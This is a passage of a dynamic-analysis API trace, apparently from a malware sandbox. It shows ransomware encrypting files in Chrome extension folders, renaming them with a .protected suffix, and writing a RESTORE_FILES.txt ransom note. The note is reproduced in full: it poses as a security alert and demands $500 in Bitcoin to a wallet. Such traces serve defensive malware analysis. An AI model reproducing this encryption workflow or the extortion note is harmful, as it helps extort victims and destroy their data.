1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0078.656] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0078.656] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0078.656] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0078.657] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0078.657] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0078.657] CloseHandle (hObject=0x164) returned 1 [0078.657] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0078.657] lstrcmpiW (lpString1="es", lpString2="Windows") returned -1 [0078.657] lstrcmpiW (lpString1="es", lpString2="Program Files") returned -1 [0078.657] lstrcmpiW (lpString1="es", lpString2="Program Files (x86)") returned -1 [0078.657] lstrcmpiW (lpString1="es", lpString2="$Recycle.bin") returned 1 [0078.657] lstrcmpiW (lpString1="es", lpString2="System Volume Information") returned -1 [0078.657] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es") returned 141 [0078.657] lstrcmpW (lpString1="es", lpString2=".") returned 1 [0078.657] lstrcmpW (lpString1="es", lpString2="..") returned 1 [0078.657] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es\\*") returned 143 [0078.657] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0078.658] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0078.658] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0078.658] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0078.658] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0078.658] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0078.658] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es\\.") returned 143 [0078.658] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0078.658] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0078.658] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0078.658] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0078.658] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0078.658] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0078.658] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0078.658] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es\\..") returned 144 [0078.659] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0078.659] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0078.659] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0078.659] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0078.659] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0078.659] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0078.659] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0078.659] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0078.659] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es\\messages.json") returned 155 [0078.659] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0078.659] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0078.659] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0078.659] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0078.659] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0078.659] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es\\messages.json") returned 155 [0078.659] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0078.659] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es\\messages.json") returned 155 [0078.659] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0078.659] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es\\messages.json") returned 155 [0078.659] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0078.659] ReadFile (in: hFile=0x168, lpBuffer=0xd12130, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd12130*, lpNumberOfBytesRead=0x295d914*=0xdf, lpOverlapped=0x0) returned 1 [0078.660] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff21, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.660] WriteFile (in: hFile=0x168, lpBuffer=0xd12130*, nNumberOfBytesToWrite=0xdf, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd12130*, lpNumberOfBytesWritten=0x295d914*=0xdf, lpOverlapped=0x0) returned 1 [0078.660] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.660] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0078.660] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0078.660] CloseHandle (hObject=0x168) returned 1 [0078.661] wnsprintfW (in: pszDest=0xd12130, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es\\messages.json.protected") returned 165 [0078.661] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es\\messages.json.protected")) returned 1 [0078.667] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0078.667] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0078.667] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es\\RESTORE_FILES.txt") returned 159 [0078.667] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0078.668] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0078.668] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0078.669] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0078.669] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0078.669] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0078.669] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0078.669] CloseHandle (hObject=0x164) returned 1 [0078.669] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0078.669] lstrcmpiW (lpString1="es_419", lpString2="Windows") returned -1 [0078.669] lstrcmpiW (lpString1="es_419", lpString2="Program Files") returned -1 [0078.669] lstrcmpiW (lpString1="es_419", lpString2="Program Files (x86)") returned -1 [0078.669] lstrcmpiW (lpString1="es_419", lpString2="$Recycle.bin") returned 1 [0078.669] lstrcmpiW (lpString1="es_419", lpString2="System Volume Information") returned -1 [0078.669] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es_419") returned 145 [0078.669] lstrcmpW (lpString1="es_419", lpString2=".") returned 1 [0078.669] lstrcmpW (lpString1="es_419", lpString2="..") returned 1 [0078.670] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es_419\\*") returned 147 [0078.670] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es_419\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0078.670] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0078.670] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0078.670] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0078.670] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0078.670] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0078.670] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es_419\\.") returned 147 [0078.670] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0078.670] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0078.670] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0078.670] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0078.670] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0078.670] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0078.670] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0078.670] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es_419\\..") returned 148 [0078.670] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0078.670] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0078.670] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0078.670] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0078.670] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0078.670] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0078.670] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0078.670] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0078.671] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es_419\\messages.json") returned 159 [0078.671] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0078.671] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0078.671] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0078.671] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0078.671] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es_419\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es_419\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0078.671] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es_419\\messages.json") returned 159 [0078.671] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0078.671] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es_419\\messages.json") returned 159 [0078.671] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0078.671] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es_419\\messages.json") returned 159 [0078.671] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0078.671] ReadFile (in: hFile=0x168, lpBuffer=0xd12130, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd12130*, lpNumberOfBytesRead=0x295d914*=0xdd, lpOverlapped=0x0) returned 1 [0078.672] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff23, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.672] WriteFile (in: hFile=0x168, lpBuffer=0xd12130*, nNumberOfBytesToWrite=0xdd, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd12130*, lpNumberOfBytesWritten=0x295d914*=0xdd, lpOverlapped=0x0) returned 1 [0078.672] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.673] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0078.673] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0078.673] CloseHandle (hObject=0x168) returned 1 [0078.673] wnsprintfW (in: pszDest=0xd12130, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es_419\\messages.json.protected") returned 169 [0078.673] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es_419\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es_419\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es_419\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es_419\\messages.json.protected")) returned 1 [0078.674] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0078.674] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0078.674] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es_419\\RESTORE_FILES.txt") returned 163 [0078.674] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es_419\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es_419\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0078.674] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0078.674] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0078.675] lstrlenA 